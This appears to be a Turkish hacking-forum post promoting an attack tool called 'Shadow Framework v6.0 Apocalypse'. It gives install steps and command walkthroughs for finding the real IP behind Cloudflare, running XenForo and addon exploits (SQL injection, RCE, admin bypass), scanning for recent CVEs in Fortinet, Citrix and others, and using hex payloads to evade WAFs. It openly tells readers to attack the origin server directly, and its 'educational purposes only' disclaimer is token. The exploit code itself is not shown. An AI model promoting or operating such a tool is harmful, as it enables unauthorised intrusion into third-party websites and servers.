TOOLS Shadow Framework v6.0 Apocalypse - Full Rehber [2026 XenForo & Cloudflare Bypass]

Selamlar arkadaşlar,

Size süper bir araç paylaşıcam. Adı Shadow Framework v6.0 Apocalypse Edition.

Neler Yapabiliyor Bu Alet?

1. Cloudflare Bypass (15 yöntem)
Cloudflare arkasındaki sitenin gerçek IP'sini buluyor. MX kayıtlarından, SPF'den, DMARC'tan, crt.sh'den, subdomain'lerden tarıyor. Ayrıca cache poisoning, HTTP smuggling var

2. XenForo Exploit (50+ tane)
XF 2.3.x'ten 1.5.x'e kadar tüm sürümler için SQL injection, RCE, XSS, LFI, admin bypass, template injection piyasadaki her exploit var.

3. 2026 Güncel CVE'ler (30 tane)
Fortinet, Citrix, VMware, Cisco, SharePoint, Confluence, Jenkins, GitLab, Spring Boot, Log4j, Exchange, Drupal....

4. Addon Exploitleri (15 tane)
XenPorta, Brivium, ThemeHouse, UI.X, DragonByte, Resource Manager, Media Gallery, Enhanced Search falan.

5. Hex Payload
Her exploit için WAF atlatmak için hex payload hazır.

---

Kurulum

Kod:
```bash
pip3 install requests urllib3 colorama dnspython


# Çalıştır
Kod:
python3 siyus.py
```

---

Kullanım Senaryoları

Senaryo 1: Sitenin Gerçek IP'sini Bulma

```bash
apocalypse-v6>
Kod:
cf-bypass site.com
```

Bu komut 15 farklı yöntemle Cloudflare arkasındaki gerçek sunucu IP'sini bulur. Çıktı şöyle olur:

```
[+] MX: mail.site.com -> 192.168.1.100
[+] SPF: 192.168.1.100
[+] DNS History: 192.168.1.100
[💀] FOUND 1 ORIGIN IP(s)!
🟢 192.168.1.100
```

Senaryo 2: Origin IP'ye Direkt Saldırı

Cloudflare'ı bypass ettin, IP'yi buldun. Şimdi direkt sunucuya saldır:

```bash
apocalypse-v6>
Kod:
xf-exploit https://192.168.1.100 site.com
```

ÖNEMLİ: İkinci parametre olarak Host header'ı vermezsen çalışmaz! Çünkü sunucu virtual host kullanıyordur.

Senaryo 3: Normal Siteye Saldırı (Cloudflare Arkasından)

```bash
apocalypse-v6>
Kod:
xf-exploit https://site.com
```

Eğer origin IP yoksa direkt site üzerinden dener. Ama Cloudflare WAF'ı varsa çoğu exploit engellenir.

Senaryo 4: Sadece Belli Bir Exploit Test Etme

```bash
# Önce tüm exploitleri listele
apocalypse-v6>
Kod:
xf-list

# Sonra sadece istediğinin hex payload'unu al
apocalypse-v6>
Kod:
xf-hex xf23_ssti_admin
```

Hex payload'ı al, Burp Suite'e yapıştır, WAF'ı del.

Senaryo 5: 2026 Güncel Açıkları Tarama

```bash
# Tüm servisleri tara
apocalypse-v6>
Kod:
arsenal https://site.com

# Sadece belli servis
apocalypse-v6>
Kod:
arsenal https://site.com fortinet
apocalypse-v6>
Kod:
arsenal https://site.com citrix
```

Senaryo 6: Full Otomatik Saldırı

```bash
apocalypse-v6>
Kod:
full-attack site.com
```

Bu komut sırayla:

1. Cloudflare bypass dener
2. Origin IP bulursa direkt saldırır
3. Bulamazsa normal yoldan dener
4. 2026 CVE taraması yapar

---

Sık Karşılaşılan Hatalar

1. "Version not detected" hatası
Site XenForo olmayabilir veya özel tema kullanıyordur. Script yine de tüm exploitleri dener.

2. Hepsi "Failed" dönüyor
Origin IP yanlış olabilir veya WAF engelliyordur. Hex payload kullanmayı dene.

3. "Host Header" sorunu
Origin IP'ye direkt bağlanırken mutlaka ikinci parametre olarak domain adını ver:

```bash
apocalypse-v6>
Kod:
xf-exploit https://1.2.3.4 asilsite.com
```

---

Önemli Not

Araç tamamen eğitim amaçlıdır. Yapılan her şey kullanıcı sorumluluğundadir.

🔒 Bu içeriği görmek için giriş yapın

 

Ekli dosyalar

  • Screenshot_20260621-181445.png
    Screenshot_20260621-181445.png
    97.8 KB · Görüntüleme: 10
Yanıt yazmak için giriş yapmalısınız
Forum özelliklerini kullanmak ve Level 2 üyelik satın almak için hesabınıza giriş yapın.
133,686Konular
3,288,909Mesajlar
324,402Kullanıcılar
raeSon Üye
Üst Alt